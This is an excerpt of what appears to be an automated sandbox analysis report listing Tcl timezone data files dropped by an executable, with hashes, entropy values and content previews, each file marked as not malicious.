                                                                                                                                                                                                                              Entropy (8bit):4.905303708777235
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcHdDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DwdDBS
                                                                                                                                                                                                                              MD5:F2D7F7BC4EA3629EC7F0E45300A0CFD2
                                                                                                                                                                                                                              SHA1:E7594D378C5DCFEB1E87E13AC79A026260D2E630
                                                                                                                                                                                                                              SHA-256:9D8009ACAB019B32B1E87AB10E0AC3765ABCABE8066318DA8CA4905D41562F72
                                                                                                                                                                                                                              SHA-512:795E58172907020C85CF0B10BBA35842D5F92872CCB3382DFDC787BAA504C79927FA23BC3104AD63541A95C44CA80977E8247846DE918A0B00963B970F4823D2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Timbuktu) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):954
                                                                                                                                                                                                                              Entropy (8bit):4.151253074491018
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862DrmdHrCDWR+f7Zn9ueRSmNvlTtuyI/ZBv8dq8Jw4VFZBZYEuAENSfp8kSYx:5veuDkWx3NdT18kbjjAkxTx
                                                                                                                                                                                                                              MD5:2DF9B050D82B06EB89DA908C31C1F1C9
                                                                                                                                                                                                                              SHA1:CB294E12560A98D5CEA3BA7004B5519B6C22BAAC
                                                                                                                                                                                                                              SHA-256:B447B6B1C351E77F22A2D77C0437F2BBB7D8BDFDFDC3D6285E0D260519CC7110
                                                                                                                                                                                                                              SHA-512:BBE281D551E9F8DA7B6BB08D809177615410A11E4B1184ABD220EA8B1F355B2BBC090C6BAAF7E07FD61286891388ECD4026D4433C4E4B6A8D201F8D95E174532
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Tripoli) {.. {-9223372036854775808 3164 0 LMT}.. {-1577926364 3600 0 CET}.. {-574902000 7200 1 CEST}.. {-512175600 7200 1 CEST}.. {-449888400 7200 1 CEST}.. {-347158800 7200 0 EET}.. {378684000 3600 0 CET}.. {386463600 7200 1 CEST}.. {402271200 3600 0 CET}.. {417999600 7200 1 CEST}.. {433807200 3600 0 CET}.. {449622000 7200 1 CEST}.. {465429600 3600 0 CET}.. {481590000 7200 1 CEST}.. {496965600 3600 0 CET}.. {512953200 7200 1 CEST}.. {528674400 3600 0 CET}.. {544230000 7200 1 CEST}.. {560037600 3600 0 CET}.. {575852400 7200 1 CEST}.. {591660000 3600 0 CET}.. {607388400 7200 1 CEST}.. {623196000 3600 0 CET}.. {641775600 7200 0 EET}.. {844034400 3600 0 CET}.. {860108400 7200 1 CEST}.. {875919600 7200 0 EET}.. {1352505600 3600 0 CET}.. {1364515200 7200 1 CEST}.. {1382662800 7200 0 EET}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):4.150944563639585
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862DHmdHjCvbB/lxRjntMVyoKCyFWeey0XSe/OSyHaCgmvLOcSFQSFeSTC6ZPJ:5LemvbplxRhbv+yuh2tIee6kvcw9Cy
                                                                                                                                                                                                                              MD5:0C99335A41D33AA8BC1EDA0CB4CDCBF5
                                                                                                                                                                                                                              SHA1:5CABC28D318FA5B8307429EA571FFF91EB8E1252
                                                                                                                                                                                                                              SHA-256:0760D1028E733888E43E7F1E057217DC2B52786029FCEC67B27EB69CC6A54938
                                                                                                                                                                                                                              SHA-512:C8FE685ACA46FD4836F3AABC15833F294E5EBED123A487D04E74A8C5668BDFAFB96D2326760452A6E5A1B9CC25AC6C3918D8C10A7F8EF737456640E3000BBA2F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Tunis) {.. {-9223372036854775808 2444 0 LMT}.. {-2797202444 561 0 PMT}.. {-1855958961 3600 0 CET}.. {-969242400 7200 1 CEST}.. {-950493600 3600 0 CET}.. {-941940000 7200 1 CEST}.. {-891136800 3600 0 CET}.. {-877827600 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-842918400 3600 0 CET}.. {-842223600 7200 1 CEST}.. {-828230400 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796269600 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766634400 3600 0 CET}.. {231202800 7200 1 CEST}.. {243903600 3600 0 CET}.. {262825200 7200 1 CEST}.. {276044400 3600 0 CET}.. {581122800 7200 1 CEST}.. {591145200 3600 0 CET}.. {606870000 7200 1 CEST}.. {622594800 3600 0 CET}.. {641516400 7200 1 CEST}.. {654649200 3600 0 CET}.. {1114902000 7200 1 CEST}.. {1128038400 3600 0 CET}.. {1143334800 7200 1 CEST}.. {1162083600 3600 0 CET}.. {11747
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1649
                                                                                                                                                                                                                              Entropy (8bit):3.9974091170263066
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5t+Lmcz0iMHHWMbnHoMcHiM0H+MCySHr/MDHqMafHO8MwHJMHHOMHSHWMHHXM5Hs:OLjQDI6jZ2WFcv
                                                                                                                                                                                                                              MD5:4846FB13467BA93EB134D88228D7F534
                                                                                                                                                                                                                              SHA1:477FC6144B7DF365606A2E44EF1430F8DF6FB841
                                                                                                                                                                                                                              SHA-256:DFC3D1FC182B315B31D999BC103C264BD205EB16F971C8636003A71170D7BD7C
                                                                                                                                                                                                                              SHA-512:A719F5083F66CE44FE047880A10B2ED04B66E01C7F0F7DADAE2FFB95172308F091D669BCFED5A236D2A0F80A4A1D78DA7A778DDE3FAECB40170ECDA705573769
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Windhoek) {.. {-9223372036854775808 4104 0 LMT}.. {-2458170504 5400 0 +0130}.. {-2109288600 7200 0 SAST}.. {-860976000 10800 1 SAST}.. {-845254800 7200 0 SAST}.. {637970400 7200 0 CAT}.. {764200800 3600 1 WAT}.. {778640400 7200 0 CAT}.. {796780800 3600 1 WAT}.. {810090000 7200 0 CAT}.. {828835200 3600 1 WAT}.. {841539600 7200 0 CAT}.. {860284800 3600 1 WAT}.. {873594000 7200 0 CAT}.. {891734400 3600 1 WAT}.. {905043600 7200 0 CAT}.. {923184000 3600 1 WAT}.. {936493200 7200 0 CAT}.. {954633600 3600 1 WAT}.. {967942800 7200 0 CAT}.. {986083200 3600 1 WAT}.. {999392400 7200 0 CAT}.. {1018137600 3600 1 WAT}.. {1030842000 7200 0 CAT}.. {1049587200 3600 1 WAT}.. {1062896400 7200 0 CAT}.. {1081036800 3600 1 WAT}.. {1094346000 7200 0 CAT}.. {1112486400 3600 1 WAT}.. {1125795600 7200 0 CAT}.. {1143936000 3600 1 WAT}.. {1157245200 7200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8447
                                                                                                                                                                                                                              Entropy (8bit):3.867931581740766
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:6hvOs5vveFaHU6lgqN/zNMkixlrxYTMcmo1LWF59:6hvOstgqN/zNMkArxiZmf
                                                                                                                                                                                                                              MD5:DF52E726B33FA47EB115C1233614E101
                                                                                                                                                                                                                              SHA1:26B0E49022FCB929F0160617F9C9D2DBEDC63610
                                                                                                                                                                                                                              SHA-256:77231D179260C08690A70AEE6C2517E4B621ED4794D9AEEA7040539F4FF05111
                                                                                                                                                                                                                              SHA-512:48AAF25419E07B06E076B0E19F9A0C27EB257556E62FD8F7B2AA963A817823DD89D33AB6AFEAAC2EF2230361D76776355E19CC2BBBB4D19536F823A347AC8AA4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Adak) {.. {-9223372036854775808 44002 0 LMT}.. {-3225223727 -42398 0 LMT}.. {-2188944802 -39600 0 NST}.. {-883573200 -39600 0 NST}.. {-880196400 -36000 1 NWT}.. {-769395600 -36000 1 NPT}.. {-765374400 -39600 0 NST}.. {-757342800 -39600 0 NST}.. {-86878800 -39600 0 BST}.. {-31496400 -39600 0 BST}.. {-21466800 -36000 1 BDT}.. {-5745600 -39600 0 BST}.. {9982800 -36000 1 BDT}.. {25704000 -39600 0 BST}.. {41432400 -36000 1 BDT}.. {57758400 -39600 0 BST}.. {73486800 -36000 1 BDT}.. {89208000 -39600 0 BST}.. {104936400 -36000 1 BDT}.. {120657600 -39600 0 BST}.. {126709200 -36000 1 BDT}.. {152107200 -39600 0 BST}.. {162392400 -36000 1 BDT}.. {183556800 -39600 0 BST}.. {199285200 -36000 1 BDT}.. {215611200 -39600 0 BST}.. {230734800 -36000 1 BDT}.. {247060800 -39600 0 BST}.. {262789200 -36000 1 BDT}.. {278510400 -39600 0 BST}.. {29423880
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8685
                                                                                                                                                                                                                              Entropy (8bit):3.9620252256806845
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:esKLO6KLC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:etLhN9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                              MD5:BFEACEA04AAA8A69A9AC71CF86BCC15C
                                                                                                                                                                                                                              SHA1:1693971B8AAA35021BA34799FB1B9FADC3DA0294
                                                                                                                                                                                                                              SHA-256:DE7FBE2B3ED780C6B82099E1E249DD41F4452A3ADB9DD807B1D0EC06049C2302
                                                                                                                                                                                                                              SHA-512:E94112A2A5F268C03C58CE3BB4C243B2B9B0FC17CB27FDD58BCD2CCC8D377B805C87A552AE7DE1C5698C5F2C4B0FCAB00A3420B1DAD944C1A2F7A47CE7118F78
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Anchorage) {.. {-9223372036854775808 50424 0 LMT}.. {-3225223727 -35976 0 LMT}.. {-2188951224 -36000 0 AST}.. {-883576800 -36000 0 AST}.. {-880200000 -32400 1 AWT}.. {-769395600 -32400 1 APT}.. {-765378000 -36000 0 AST}.. {-86882400 -36000 0 AHST}.. {-31500000 -36000 0 AHST}.. {-21470400 -32400 1 AHDT}.. {-5749200 -36000 0 AHST}.. {9979200 -32400 1 AHDT}.. {25700400 -36000 0 AHST}.. {41428800 -32400 1 AHDT}.. {57754800 -36000 0 AHST}.. {73483200 -32400 1 AHDT}.. {89204400 -36000 0 AHST}.. {104932800 -32400 1 AHDT}.. {120654000 -36000 0 AHST}.. {126705600 -32400 1 AHDT}.. {152103600 -36000 0 AHST}.. {162388800 -32400 1 AHDT}.. {183553200 -36000 0 AHST}.. {199281600 -32400 1 AHDT}.. {215607600 -36000 0 AHST}.. {230731200 -32400 1 AHDT}.. {247057200 -36000 0 AHST}.. {262785600 -32400 1 AHDT}.. {278506800 -36000 0 AHST}.. {294235200 -3
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):202
                                                                                                                                                                                                                              Entropy (8bit):4.908728298285591
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290/8J5290ppv:MByMYbpwt290/8m90b
                                                                                                                                                                                                                              MD5:1C3CE9F156ABECEAA794E8F1F3A7ADDB
                                                                                                                                                                                                                              SHA1:6F84D0A424FD2DE85E3420EA320A186B277B0295
                                                                                                                                                                                                                              SHA-256:F38610019C0A2C18AC71F5AA108B9647D9B5C01DCB55211AFB8312308C41FE70
                                                                                                                                                                                                                              SHA-512:CA2DA6F9551E4DBF775D7D059F6F3399E0C4F2A428699726CD2A1B0BB17CCF5CDEEF645EE1759A2A349F3F29E0343600B89CE1F4659CF5D2B58280A381C018AD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Anguilla) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.898881450964165
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290//MFe90ppv:MByMYbpwt290//V90b
                                                                                                                                                                                                                              MD5:DB16FFE76D625DEC731AB6320F5EF9BF
                                                                                                                                                                                                                              SHA1:D286994E03E4F82C08DE094B436FA098648AFADE
                                                                                                                                                                                                                              SHA-256:561E58E11DC5A86CAE04B5CB40F43EFCFF9ABC0C841FAC094619E9C5E0B403F8
                                                                                                                                                                                                                              SHA-512:8842B616205378AF78B0B2FC3F6517385845DE30FFD477A21ACFA0060D161FB6462A3C266DCFD54F101729446B8E1B2ECF463C9CF2E6CE227B2628A19AF365F9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Antigua) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1782
                                                                                                                                                                                                                              Entropy (8bit):3.733307964154526
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5KChlvEw6kSSx5H4a8tf3fkuozd23t8VZDG8+GCRRRd:QIlvEwJSSxdF8tfMuozdCt8VZy8+GCRB
                                                                                                                                                                                                                              MD5:9B01680A362EA7B462DC236F6A35E14C
                                                                                                                                                                                                                              SHA1:456A5E771F6B749BFDB2BFD59836A6A930499881
                                                                                                                                                                                                                              SHA-256:B1327CBEC20A21E3FF873E28A2EDFA271EE3A5C01933779300EABD6B185DA010
                                                                                                                                                                                                                              SHA-512:E6C2F5C489BEA31B0AAC3CB1DB750AC2B665DAC0AC82C1CE6756E768305300297BA5E3B32EDEB9E1715452F02223E47674C4F2B1844920F664623C9F34309240
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Araguaina) {.. {-9223372036854775808 -11568 0 LMT}.. {-1767214032 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2048
                                                                                                                                                                                                                              Entropy (8bit):3.7664759014118188
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5p9uuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwfFC8OS0wi:jIu3pfe92jCs/VOHv2kdeRtnxafwwfF0
                                                                                                                                                                                                                              MD5:2B9A1EDE5110B46E24F4726664EA1E3F
                                                                                                                                                                                                                              SHA1:939D1A7A50544F34B318ACDB52BC6930FE453F6D
                                                                                                                                                                                                                              SHA-256:BC86AC89121EC4AA302F6259CCC97EFFD7022DC6CEE3B291C57DA72B6EA0C558
                                                                                                                                                                                                                              SHA-512:C204740DACBCECF2CC5CF4FEB687E86B9150512623203C999D6F4EB5FB246D07681A35C28D8445F6A50F49940C321E0AA5E51FE5A73B8ED076F29CEB5B4D4CA2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Buenos_Aires) {.. {-9223372036854775808 -14028 0 LMT}.. {-2372097972 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-7522
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2077
                                                                                                                                                                                                                              Entropy (8bit):3.742645155048276
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5/nuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafww3mC8OS0NC:Vuu3pfe92jCs/VOHv2kdeRtnxafww3mP
                                                                                                                                                                                                                              MD5:3D2AF5714DFC392ED4BC976784D5A58A
                                                                                                                                                                                                                              SHA1:9252DE40B6EF872E1D2F7CDD53DDD21145E93C5C
                                                                                                                                                                                                                              SHA-256:A516BB0937977EF949D47B3C8675E30F1CA6C34F8BD298DCF6EBB943580D5317
                                                                                                                                                                                                                              SHA-512:8D5FFDB5B578B8EA0291D3A21BDDE25F8301CB16B11AE794FFBA8DCFFE46F6AC5EC03D93E511061B132D84E69E5FAF1BB212837EB8A5A4B4BE517F783837E615
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Catamarca) {.. {-9223372036854775808 -15788 0 LMT}.. {-2372096212 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-7522740
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):242
                                                                                                                                                                                                                              Entropy (8bit):4.72138001874583
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MMXAXHAIgp/MMXmRN/290/MquQ90/MMXAy:MByMY/MYp/MrRt290/MquQ90/MK
                                                                                                                                                                                                                              MD5:8A609667DE461CEDC1127BE38B161459
                                                                                                                                                                                                                              SHA1:557D2D55DEA38D1CD1103E183F89C65F4016662B
                                                                                                                                                                                                                              SHA-256:8CCD6FC77D55582938F1912B1BA66035882D1BFC18A797C631E5E89ABFBF570B
                                                                                                                                                                                                                              SHA-512:DBAFDA069DB5FDBCBA11050AC91A733C1712BD6395939CFFFC5EAA78BD0B70B4AF2D9FB8954C6841CCF3AC5F8EDCF08E604D3F2CF67F1CBEA5EB6D3C4DC7F2FA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Catamarca)]} {.. LoadTimeZoneFile America/Argentina/Catamarca..}..set TZData(:America/Argentina/ComodRivadavia) $TZData(:America/Argentina/Catamarca)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2043
                                                                                                                                                                                                                              Entropy (8bit):3.7481312409221594
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5lxQuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafww3mC8OS0n:/xBu3pfe92jCs/VOHv2kdeRtnxafww3j
                                                                                                                                                                                                                              MD5:8C1D665A25E61CE462C2AC57687763BF
                                                                                                                                                                                                                              SHA1:B5BBC26CF6A24BD5BEA42AC485D62C789B80905F
                                                                                                                                                                                                                              SHA-256:FA75E274240A341C6BFE3539CFDC114D125AEAEA3161D3C2409347CF8046042A
                                                                                                                                                                                                                              SHA-512:A89A7A92C025B87DA4CDFE99BF70CD0E64690D7BFE827DCBFBF0E91B188003FA26487E72B6B950D3BFC9C854B890E5936F414BBEAAD5F3F0673AC5EFE273CDF4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Cordoba) {.. {-9223372036854775808 -15408 0 LMT}.. {-2372096592 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2041
                                                                                                                                                                                                                              Entropy (8bit):3.7481290145270245
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5HluuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwcSPAC8OS0E:xwu3pfe92jCs/VOHv2kdeRtnxafwcDCK
                                                                                                                                                                                                                              MD5:995EDE9E1E86DB500C7437A196325E21
                                                                                                                                                                                                                              SHA1:4A8FB1511AA124CA2D299EC8DE155EE9D0479180
                                                                                                                                                                                                                              SHA-256:43EB79ABC03CBAC661C563DE1BC09D9DD855CBC72DD2B6467EA98F0F90421BA9
                                                                                                                                                                                                                              SHA-512:B58B35EA1B2F0388B8108DCF254F3BD1B21894F00A9F313ABC093BC52C36FCDD94B7486DBA38161C9EFCDB12BC3CD81E7E02395B0CA480A7F01148C43CD3054F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Jujuy) {.. {-9223372036854775808 -15672 0 LMT}.. {-2372096328 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000 -
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2106
                                                                                                                                                                                                                              Entropy (8bit):3.744252944523733
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5lduuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwkFC8OS0NC:Tou3pfe92jCs/VOHv2kdeRtnxafwwkFP
                                                                                                                                                                                                                              MD5:4A45A063D45EB94214005EF3CA5BCD6D
                                                                                                                                                                                                                              SHA1:2420E8591DC53A39EE1A58B2E45DCFAF9503685F
                                                                                                                                                                                                                              SHA-256:2B018B791E48269FA9EDA12662FFEC3E2DC33603A918E8B735B8D7D6BEB3B3AA
